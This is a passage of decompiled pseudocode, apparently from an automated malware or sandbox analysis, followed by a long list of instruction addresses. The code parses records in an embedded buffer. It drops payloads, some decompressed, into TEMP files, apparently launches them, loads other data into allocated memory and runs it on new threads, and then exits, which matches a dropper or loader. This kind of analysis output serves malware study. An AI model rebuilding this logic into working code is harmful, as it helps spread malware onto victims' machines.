                                                                                                                                                                                                                                                                          								_v36 =  *_v20;
                                                                                                                                                                                                                                                                          								_v20 = _v20 + _v36;
                                                                                                                                                                                                                                                                          								if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                          									goto L10;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									return 0;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v13 = 0;
                                                                                                                                                                                                                                                                          						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                          						_v48 = 0;
                                                                                                                                                                                                                                                                          						while(1) {
                                                                                                                                                                                                                                                                          							__eflags = _v48 - _v12;
                                                                                                                                                                                                                                                                          							if(_v48 >= _v12) {
                                                                                                                                                                                                                                                                          								break;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							__eflags = _v48;
                                                                                                                                                                                                                                                                          							if(_v48 <= 0) {
                                                                                                                                                                                                                                                                          								L29:
                                                                                                                                                                                                                                                                          								_v52 = _v20 + 0x18;
                                                                                                                                                                                                                                                                          								_v56 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e274; // 0x2
                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                          									L39:
                                                                                                                                                                                                                                                                          									_t448 = _v20;
                                                                                                                                                                                                                                                                          									__eflags =  *(_t448 + 0xc) & 0x00000002;
                                                                                                                                                                                                                                                                          									if(( *(_t448 + 0xc) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                          										__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e270; // 0x1
                                                                                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                                                                                          											L90:
                                                                                                                                                                                                                                                                          											__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e278; // 0x3
                                                                                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                                                                                          												L93:
                                                                                                                                                                                                                                                                          												__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e27c; // 0x4
                                                                                                                                                                                                                                                                          												if(__eflags == 0) {
                                                                                                                                                                                                                                                                          													_v13 = 1;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												L95:
                                                                                                                                                                                                                                                                          												L24:
                                                                                                                                                                                                                                                                          												_t452 = _v48 + 1;
                                                                                                                                                                                                                                                                          												__eflags = _t452;
                                                                                                                                                                                                                                                                          												_v48 = _t452;
                                                                                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e288; // 0x2
                                                                                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                                                                                          												goto L93;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											_t317 =  *0x400e28c; // 0x4013f88
                                                                                                                                                                                                                                                                          											_t455 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          											E0400A360(_t455, _t317, _v52, _v56);
                                                                                                                                                                                                                                                                          											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                          											goto L95;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                                                                                          											goto L90;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										_t321 = E04007250(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                          										_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                          										__eflags = _t321 & 0x000000ff;
                                                                                                                                                                                                                                                                          										if((_t321 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          											_t528 = _v20;
                                                                                                                                                                                                                                                                          											__eflags =  *(_t528 + 0x14);
                                                                                                                                                                                                                                                                          											if( *(_t528 + 0x14) == 0) {
                                                                                                                                                                                                                                                                          												L48:
                                                                                                                                                                                                                                                                          												_t529 = _v20;
                                                                                                                                                                                                                                                                          												__eflags =  *(_t529 + 0xc) & 0x00000001;
                                                                                                                                                                                                                                                                          												if(( *(_t529 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                          													GetEnvironmentVariableA("TEMP",  &_v1196, 0x104);
                                                                                                                                                                                                                                                                          													E04007D20( &_v932,  &_v932, 0, 0xa);
                                                                                                                                                                                                                                                                          													E04009730( &_v932, 4);
                                                                                                                                                                                                                                                                          													_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                          													GetTempFileNameA( &_v1196,  &_v932, GetTickCount() % 0xffff,  &_v916);
                                                                                                                                                                                                                                                                          													_v920 = CreateFileA( &_v916, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                          													__eflags = _v920 - 0xffffffff;
                                                                                                                                                                                                                                                                          													if(_v920 == 0xffffffff) {
                                                                                                                                                                                                                                                                          														L89:
                                                                                                                                                                                                                                                                          														goto L24;
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													_v1200 = 0;
                                                                                                                                                                                                                                                                          													_v1204 = 0;
                                                                                                                                                                                                                                                                          													_v1208 = _v56;
                                                                                                                                                                                                                                                                          													_t333 = _v20;
                                                                                                                                                                                                                                                                          													__eflags =  *(_t333 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                          													if(( *(_t333 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          														_v1204 = WriteFile(_v920, _v52, _v56,  &_v1200, 0);
                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                          														_v1216 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                          														_v1212 = VirtualAlloc(0, _v1216, 0x3000, 4);
                                                                                                                                                                                                                                                                          														__eflags = _v1212;
                                                                                                                                                                                                                                                                          														if(_v1212 != 0) {
                                                                                                                                                                                                                                                                          															_t349 = E04006260(_v56, _v52, _v56, _v1212, _v1216);
                                                                                                                                                                                                                                                                          															__eflags = _t349 - _v1216;
                                                                                                                                                                                                                                                                          															if(_t349 == _v1216) {
                                                                                                                                                                                                                                                                          																_v1204 = WriteFile(_v920, _v1212, _v1216,  &_v1200, 0);
                                                                                                                                                                                                                                                                          																_v1208 = _v1216;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          															VirtualFree(_v1212, 0, 0x8000);
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													__eflags = _v1204;
                                                                                                                                                                                                                                                                          													if(_v1204 == 0) {
                                                                                                                                                                                                                                                                          														L88:
                                                                                                                                                                                                                                                                          														CloseHandle(_v920);
                                                                                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                                                                                          														__eflags = _v1200 - _v1208;
                                                                                                                                                                                                                                                                          														if(_v1200 != _v1208) {
                                                                                                                                                                                                                                                                          															goto L88;
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          														CloseHandle(_v920);
                                                                                                                                                                                                                                                                          														_t340 = E04001E60( &_v916);
                                                                                                                                                                                                                                                                          														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                          														_v1220 = _t340;
                                                                                                                                                                                                                                                                          														__eflags = _v1220;
                                                                                                                                                                                                                                                                          														if(_v1220 != 0) {
                                                                                                                                                                                                                                                                          															_t465 = _v20;
                                                                                                                                                                                                                                                                          															__eflags =  *(_t465 + 0x10);
                                                                                                                                                                                                                                                                          															if( *(_t465 + 0x10) != 0) {
                                                                                                                                                                                                                                                                          																E040073C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                          																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          															_t539 = _v20;
                                                                                                                                                                                                                                                                          															__eflags =  *(_t539 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                          															if(( *(_t539 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                          																E04002510(_v1220, 0x400e290);
                                                                                                                                                                                                                                                                          																_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          															_v8 = 1;
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													goto L89;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												_v636 = 0;
                                                                                                                                                                                                                                                                          												_v632 = 0;
                                                                                                                                                                                                                                                                          												_v640 = 0;
                                                                                                                                                                                                                                                                          												_t472 = _v20;
                                                                                                                                                                                                                                                                          												__eflags =  *(_t472 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                          												if(( *(_t472 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          													_t355 = E04002070(_v52);
                                                                                                                                                                                                                                                                          													_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                          													_v636 = _t355;
                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                          													_v640 =  *((intOrPtr*)(_v52 + _v56 - 4));
                                                                                                                                                                                                                                                                          													_t378 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          													_v644 = _t378;
                                                                                                                                                                                                                                                                          													__eflags = _v644;
                                                                                                                                                                                                                                                                          													if(_v644 != 0) {
                                                                                                                                                                                                                                                                          														_t381 = E04006260(_v644, _v52, _v56, _v644, _v640);
                                                                                                                                                                                                                                                                          														__eflags = _t381 - _v640;
                                                                                                                                                                                                                                                                          														if(_t381 == _v640) {
                                                                                                                                                                                                                                                                          															_t383 = E04002070(_v644); // executed
                                                                                                                                                                                                                                                                          															_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                          															_v636 = _t383;
                                                                                                                                                                                                                                                                          															_t563 = _v20;
                                                                                                                                                                                                                                                                          															__eflags =  *(_t563 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                          															if(( *(_t563 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                          																_t386 = VirtualAlloc(0, _v640, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          																_v632 = _t386;
                                                                                                                                                                                                                                                                          																E04007B70(_v632, _v644, _v640);
                                                                                                                                                                                                                                                                          																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          														VirtualFree(_v644, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												__eflags = _v636;
                                                                                                                                                                                                                                                                          												if(_v636 != 0) {
                                                                                                                                                                                                                                                                          													_t473 = _v20;
                                                                                                                                                                                                                                                                          													__eflags =  *(_t473 + 0x10);
                                                                                                                                                                                                                                                                          													if( *(_t473 + 0x10) != 0) {
                                                                                                                                                                                                                                                                          														E040073C0(_v20, _v52, _v56);
                                                                                                                                                                                                                                                                          														_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													_t549 = _v20;
                                                                                                                                                                                                                                                                          													__eflags =  *(_t549 + 0xc) & 0x00000008;
                                                                                                                                                                                                                                                                          													if(( *(_t549 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                          														_t361 = E040097A0(0x10);
                                                                                                                                                                                                                                                                          														_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                          														_v1228 = _t361;
                                                                                                                                                                                                                                                                          														_v648 = _v1228;
                                                                                                                                                                                                                                                                          														_t551 = _v20;
                                                                                                                                                                                                                                                                          														__eflags =  *(_t551 + 0xc) & 0x00000010;
                                                                                                                                                                                                                                                                          														if(( *(_t551 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          															 *_v648 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                          															__eflags =  *_v648;
                                                                                                                                                                                                                                                                          															if( *_v648 != 0) {
                                                                                                                                                                                                                                                                          																E04007B70( *_v648, _v52, _v56);
                                                                                                                                                                                                                                                                          																_t598 = _t598 + 0xc;
                                                                                                                                                                                                                                                                          																 *(_v648 + 4) = _v56;
                                                                                                                                                                                                                                                                          															}
                                                                                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                                                                                          															 *_v648 = _v632;
                                                                                                                                                                                                                                                                          															 *(_v648 + 4) = _v640;
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          														__eflags =  *_v648;
                                                                                                                                                                                                                                                                          														if( *_v648 != 0) {
                                                                                                                                                                                                                                                                          															 *((intOrPtr*)(_v648 + 8)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                          															 *((intOrPtr*)(_v648 + 0xc)) = _v636;
                                                                                                                                                                                                                                                                          															_t368 = CreateThread(0, 0, E040077B0, _v648, 0, 0); // executed
                                                                                                                                                                                                                                                                          															_v652 = _t368;
                                                                                                                                                                                                                                                                          															CloseHandle(_v652);
                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													_t550 = _v20;
                                                                                                                                                                                                                                                                          													__eflags =  *(_t550 + 0xc) & 0x00000004;
                                                                                                                                                                                                                                                                          													if(( *(_t550 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                          														E04002510(_v636, 0x400e290);
                                                                                                                                                                                                                                                                          														_t598 = _t598 + 8;
                                                                                                                                                                                                                                                                          													}
                                                                                                                                                                                                                                                                          													_v8 = 1;
                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                          												goto L24;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											_v620 = VirtualAlloc(0, _v56, 0x3000, 4);
                                                                                                                                                                                                                                                                          											__eflags = _v620;
                                                                                                                                                                                                                                                                          											if(_v620 == 0) {
                                                                                                                                                                                                                                                                          												goto L48;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          											E04007B70(_v620, _v52, _v56);
                                                                                                                                                                                                                                                                          											_t393 = E040097A0(0x20);
                                                                                                                                                                                                                                                                          											_t598 = _t598 + 0x10;
                                                                                                                                                                                                                                                                          											_v1224 = _t393;
                                                                                                                                                                                                                                                                          											_v624 = _v1224;
                                                                                                                                                                                                                                                                          											 *_v624 =  *_v20;
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 4)) =  *((intOrPtr*)(_v20 + 4));
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 8)) =  *((intOrPtr*)(_v20 + 8));
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0x14)) =  *((intOrPtr*)(_v20 + 0x14));
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0x1c)) = _v56;
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0xc)) =  *((intOrPtr*)(_v20 + 0xc));
                                                                                                                                                                                                                                                                          											 *((intOrPtr*)(_v624 + 0x10)) =  *((intOrPtr*)(_v20 + 0x10));
                                                                                                                                                                                                                                                                          											 *(_v624 + 0x18) = _v620;
                                                                                                                                                                                                                                                                          											_v628 = CreateThread(0, 0, E04006DA0, _v624, 0, 0);
                                                                                                                                                                                                                                                                          											CloseHandle(_v628);
                                                                                                                                                                                                                                                                          											goto L24;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          										goto L24;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L24;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                          								E04007D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                          								E04009730( &_v340, 4);
                                                                                                                                                                                                                                                                          								_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                          								GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                          								_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                                                          								__eflags = _v328 - 0xffffffff;
                                                                                                                                                                                                                                                                          								if(_v328 == 0xffffffff) {
                                                                                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v608 = 0;
                                                                                                                                                                                                                                                                          								_v612 = 0;
                                                                                                                                                                                                                                                                          								_t415 = WriteFile(_v328, _v52, _v56,  &_v612, 0);
                                                                                                                                                                                                                                                                          								__eflags = _t415;
                                                                                                                                                                                                                                                                          								if(_t415 == 0) {
                                                                                                                                                                                                                                                                          									L37:
                                                                                                                                                                                                                                                                          									__eflags = _v608;
                                                                                                                                                                                                                                                                          									if(_v608 == 0) {
                                                                                                                                                                                                                                                                          										CloseHandle(_v328);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								__eflags = _v612 - _v56;
                                                                                                                                                                                                                                                                          								if(_v612 != _v56) {
                                                                                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v608 = CloseHandle(_v328);
                                                                                                                                                                                                                                                                          								E04006C60();
                                                                                                                                                                                                                                                                          								_t421 = E04001E60( &_v324);
                                                                                                                                                                                                                                                                          								_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                          								_v616 = _t421;
                                                                                                                                                                                                                                                                          								__eflags = _v616;
                                                                                                                                                                                                                                                                          								if(_v616 == 0) {
                                                                                                                                                                                                                                                                          									E04006CF0();
                                                                                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								E040074A0();
                                                                                                                                                                                                                                                                          								ExitProcess(0);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v60 =  *_v20;
                                                                                                                                                                                                                                                                          							_v20 = _v20 + _v60;
                                                                                                                                                                                                                                                                          							__eflags = _v20 - _a4 + _a8;
                                                                                                                                                                                                                                                                          							if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                          								goto L29;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						__eflags = (_v13 & 0x000000ff) - 1;
                                                                                                                                                                                                                                                                          						if((_v13 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                          							 *0x40130e4 = 1;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							 *0x40130e4 = 2;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L99;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}
















































































                                                                                                                                                                                                                                                                          0x040062b9
                                                                                                                                                                                                                                                                          0x040062c4
                                                                                                                                                                                                                                                                          0x04006c4e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040062d4
                                                                                                                                                                                                                                                                          0x040062d9
                                                                                                                                                                                                                                                                          0x040062e0
                                                                                                                                                                                                                                                                          0x040062f9
                                                                                                                                                                                                                                                                          0x040062fc
                                                                                                                                                                                                                                                                          0x0400630e
                                                                                                                                                                                                                                                                          0x0400631e
                                                                                                                                                                                                                                                                          0x04006343
                                                                                                                                                                                                                                                                          0x04006349
                                                                                                                                                                                                                                                                          0x04006354
                                                                                                                                                                                                                                                                          0x0400635d
                                                                                                                                                                                                                                                                          0x04006363
                                                                                                                                                                                                                                                                          0x04006429
                                                                                                                                                                                                                                                                          0x04006308
                                                                                                                                                                                                                                                                          0x04006308
                                                                                                                                                                                                                                                                          0x0400630b
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400630b
                                                                                                                                                                                                                                                                          0x0400636f
                                                                                                                                                                                                                                                                          0x04006375
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400637b
                                                                                                                                                                                                                                                                          0x04006381
                                                                                                                                                                                                                                                                          0x04006384
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006391
                                                                                                                                                                                                                                                                          0x04006393
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006399
                                                                                                                                                                                                                                                                          0x0400639f
                                                                                                                                                                                                                                                                          0x040063a2
                                                                                                                                                                                                                                                                          0x04006419
                                                                                                                                                                                                                                                                          0x0400641e
                                                                                                                                                                                                                                                                          0x04006424
                                                                                                                                                                                                                                                                          0x04006427
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006427
                                                                                                                                                                                                                                                                          0x040063ad
                                                                                                                                                                                                                                                                          0x040063c3
                                                                                                                                                                                                                                                                          0x040063c6
                                                                                                                                                                                                                                                                          0x040063ca
                                                                                                                                                                                                                                                                          0x0400640e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400640e
                                                                                                                                                                                                                                                                          0x040063dc
                                                                                                                                                                                                                                                                          0x040063e1
                                                                                                                                                                                                                                                                          0x040063e4
                                                                                                                                                                                                                                                                          0x040063ef
                                                                                                                                                                                                                                                                          0x040063f4
                                                                                                                                                                                                                                                                          0x040063fa
                                                                                                                                                                                                                                                                          0x040063fa
                                                                                                                                                                                                                                                                          0x04006408
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006320
                                                                                                                                                                                                                                                                          0x04006325
                                                                                                                                                                                                                                                                          0x0400632e
                                                                                                                                                                                                                                                                          0x0400633a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400633c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400633c
                                                                                                                                                                                                                                                                          0x0400633a
                                                                                                                                                                                                                                                                          0x0400631e
                                                                                                                                                                                                                                                                          0x0400642e
                                                                                                                                                                                                                                                                          0x04006438
                                                                                                                                                                                                                                                                          0x0400643b
                                                                                                                                                                                                                                                                          0x0400644d
                                                                                                                                                                                                                                                                          0x04006450
                                                                                                                                                                                                                                                                          0x04006453
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006459
                                                                                                                                                                                                                                                                          0x0400645d
                                                                                                                                                                                                                                                                          0x04006482
                                                                                                                                                                                                                                                                          0x04006488
                                                                                                                                                                                                                                                                          0x04006493
                                                                                                                                                                                                                                                                          0x0400649c
                                                                                                                                                                                                                                                                          0x040064a2
                                                                                                                                                                                                                                                                          0x040065f3
                                                                                                                                                                                                                                                                          0x040065f3
                                                                                                                                                                                                                                                                          0x040065f9
                                                                                                                                                                                                                                                                          0x040065fc
                                                                                                                                                                                                                                                                          0x04006609
                                                                                                                                                                                                                                                                          0x0400660f
                                                                                                                                                                                                                                                                          0x04006bdd
                                                                                                                                                                                                                                                                          0x04006be3
                                                                                                                                                                                                                                                                          0x04006be9
                                                                                                                                                                                                                                                                          0x04006c18
                                                                                                                                                                                                                                                                          0x04006c1e
                                                                                                                                                                                                                                                                          0x04006c24
                                                                                                                                                                                                                                                                          0x04006c26
                                                                                                                                                                                                                                                                          0x04006c26
                                                                                                                                                                                                                                                                          0x04006c2a
                                                                                                                                                                                                                                                                          0x04006444
                                                                                                                                                                                                                                                                          0x04006447
                                                                                                                                                                                                                                                                          0x04006447
                                                                                                                                                                                                                                                                          0x0400644a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400644a
                                                                                                                                                                                                                                                                          0x04006bf1
                                                                                                                                                                                                                                                                          0x04006bf7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006c01
                                                                                                                                                                                                                                                                          0x04006c07
                                                                                                                                                                                                                                                                          0x04006c0e
                                                                                                                                                                                                                                                                          0x04006c13
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006c13
                                                                                                                                                                                                                                                                          0x0400661b
                                                                                                                                                                                                                                                                          0x04006621
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006633
                                                                                                                                                                                                                                                                          0x04006638
                                                                                                                                                                                                                                                                          0x0400663e
                                                                                                                                                                                                                                                                          0x04006640
                                                                                                                                                                                                                                                                          0x04006647
                                                                                                                                                                                                                                                                          0x0400664a
                                                                                                                                                                                                                                                                          0x0400664e
                                                                                                                                                                                                                                                                          0x04006752
                                                                                                                                                                                                                                                                          0x04006752
                                                                                                                                                                                                                                                                          0x04006758
                                                                                                                                                                                                                                                                          0x0400675b
                                                                                                                                                                                                                                                                          0x040069cb
                                                                                                                                                                                                                                                                          0x040069dc
                                                                                                                                                                                                                                                                          0x040069ed
                                                                                                                                                                                                                                                                          0x040069f2
                                                                                                                                                                                                                                                                          0x04006a1a
                                                                                                                                                                                                                                                                          0x04006a3c
                                                                                                                                                                                                                                                                          0x04006a42
                                                                                                                                                                                                                                                                          0x04006a49
                                                                                                                                                                                                                                                                          0x04006bd6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006bd6
                                                                                                                                                                                                                                                                          0x04006a4f
                                                                                                                                                                                                                                                                          0x04006a59
                                                                                                                                                                                                                                                                          0x04006a66
                                                                                                                                                                                                                                                                          0x04006a6c
                                                                                                                                                                                                                                                                          0x04006a72
                                                                                                                                                                                                                                                                          0x04006a75
                                                                                                                                                                                                                                                                          0x04006b3c
                                                                                                                                                                                                                                                                          0x04006a7b
                                                                                                                                                                                                                                                                          0x04006a84
                                                                                                                                                                                                                                                                          0x04006aa0
                                                                                                                                                                                                                                                                          0x04006aa6
                                                                                                                                                                                                                                                                          0x04006aad
                                                                                                                                                                                                                                                                          0x04006ac5
                                                                                                                                                                                                                                                                          0x04006aca
                                                                                                                                                                                                                                                                          0x04006ad0
                                                                                                                                                                                                                                                                          0x04006af6
                                                                                                                                                                                                                                                                          0x04006b02
                                                                                                                                                                                                                                                                          0x04006b02
                                                                                                                                                                                                                                                                          0x04006b16
                                                                                                                                                                                                                                                                          0x04006b16
                                                                                                                                                                                                                                                                          0x04006b1c
                                                                                                                                                                                                                                                                          0x04006b42
                                                                                                                                                                                                                                                                          0x04006b49
                                                                                                                                                                                                                                                                          0x04006bc9
                                                                                                                                                                                                                                                                          0x04006bd0
                                                                                                                                                                                                                                                                          0x04006b4b
                                                                                                                                                                                                                                                                          0x04006b51
                                                                                                                                                                                                                                                                          0x04006b57
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006b60
                                                                                                                                                                                                                                                                          0x04006b6d
                                                                                                                                                                                                                                                                          0x04006b72
                                                                                                                                                                                                                                                                          0x04006b75
                                                                                                                                                                                                                                                                          0x04006b7b
                                                                                                                                                                                                                                                                          0x04006b82
                                                                                                                                                                                                                                                                          0x04006b84
                                                                                                                                                                                                                                                                          0x04006b87
                                                                                                                                                                                                                                                                          0x04006b8b
                                                                                                                                                                                                                                                                          0x04006b99
                                                                                                                                                                                                                                                                          0x04006b9e
                                                                                                                                                                                                                                                                          0x04006b9e
                                                                                                                                                                                                                                                                          0x04006ba1
                                                                                                                                                                                                                                                                          0x04006ba7
                                                                                                                                                                                                                                                                          0x04006baa
                                                                                                                                                                                                                                                                          0x04006bb8
                                                                                                                                                                                                                                                                          0x04006bbd
                                                                                                                                                                                                                                                                          0x04006bbd
                                                                                                                                                                                                                                                                          0x04006bc0
                                                                                                                                                                                                                                                                          0x04006bc0
                                                                                                                                                                                                                                                                          0x04006bc7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04006b49
                                                                                                                                                                                                                                                                          0x04006761
                                                                                                                                                                                                                                                                          0x0400676b
                                                                                                                                                                                                                                                                          0x04006775
                                                                                                                                                                                                                                                                          0x0400677f
                                                                                                                                                                                                                                                                          0x04006785
                                                                                                                                                                                                                                                                          0x04006788
                                                                                                                                                                                                                                                                          0x0400685c
                                                                                                                                                                                                                                                                          0x04006861
                                                                                                                                                                                                                                                                          0x04006864
                                                                                                                                                                                                                                                                          0x0400678e
                                                                                                                                                                                                                                                                          0x04006797
                                                                                                                                                                                                                                                                          0x040067ad
                                                                                                                                                                                                                                                                          0x040067b3
                                                                                                                                                                                                                                                                          0x040067b9
                                                                                                                                                                                                                                                                          0x040067c0
                                                                                                                                                                                                                                                                          0x040067dc
                                                                                                                                                                                                                                                                          0x040067e1
                                                                                                                                                                                                                                                                          0x040067e7
                                                                                                                                                                                                                                                                          0x040067f0
                                                                                                                                                                                                                                                                          0x040067f5
                                                                                                                                                                                                                                                                          0x040067f8
                                                                                                                                                                                                                                                                          0x040067fe
                                                                                                                                                                                                                                                                          0x04006804
